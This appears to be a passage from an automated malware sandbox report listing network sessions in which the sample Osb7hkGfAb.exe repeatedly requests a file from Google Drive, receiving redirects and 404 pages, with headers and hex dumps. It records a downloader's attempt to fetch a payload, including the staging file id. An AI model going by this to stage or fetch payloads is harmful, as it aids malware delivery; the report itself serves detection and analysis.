                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-6d4IpyEytAyYbs0vqGMRQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.949734216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:25 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:25 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRO57T2K7colnyhwUvPUvlJmClTN9Ob3CWxV8jFKMtVDfC1neRRWjhIEJghe4-4lq6P3JXQZmk
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:25 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce--1ESJaz01lvLRX6oC-dW-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:25 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 53 43 2d 46 4b 35 6e 65 58 47 48 73 4d 50 48 50 7a 4f 6f 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xSC-FK5neXGHsMPHPzOoiQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.949735142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:26 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:27 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:26 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-fynV8uMp6SS_WF_GoMrpAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.949736216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:27 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:28 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC6tVDUW1WOIG1l1VGlPaLlJl5tH4LRkzvxkdnlbxdyicur_gge-AhAC1aq24tFfihqwd2G7u9M
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:27 GMT
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-x_mUsV-kCI9W_X2uyM-4Og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:28 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 31 5a 38 63 35 37 67 4f 54 48 68 37 65 63 55 67 42 75 31 71 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H1Z8c57gOTHh7ecUgBu1qQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.949737142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:29 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:29 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:29 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-cvFigcL0927iD-s3uyQBBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.949738216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:30 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:30 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC53rXWdShk70ZKEUjonQe00GcMxIFVLx0w08FqAmCDSz4spfPG5YL6nNnEH29zZOocyeIC6yJU
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:30 GMT
                                                                Content-Security-Policy: script-src 'nonce-fpRRdPgB7GNO4OZkEKV_MA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 45 66 72 7a 37 33 49 50 75 35 67 33 4b 73 31 66 44 35 7a 6f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZEfrz73IPu5g3Ks1fD5zoQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.949739142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:31 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:31 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:31 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-DSpJQRn-wEpmI1PdOY5woA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.949740216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:32 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:32 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRVR5IzLRpnnnxydUREqmjRS7TJXteTZSvxFEPKRB1WsvUXnEBhfS63MbCjSUIKq2GP82x9zjE
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:32 GMT
                                                                Content-Security-Policy: script-src 'nonce-oE9DqlJ-biK9lOHqag4IXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:32 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 44 53 6b 6f 51 7a 54 67 4f 6f 79 6a 65 53 37 6e 72 4d 52 74 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
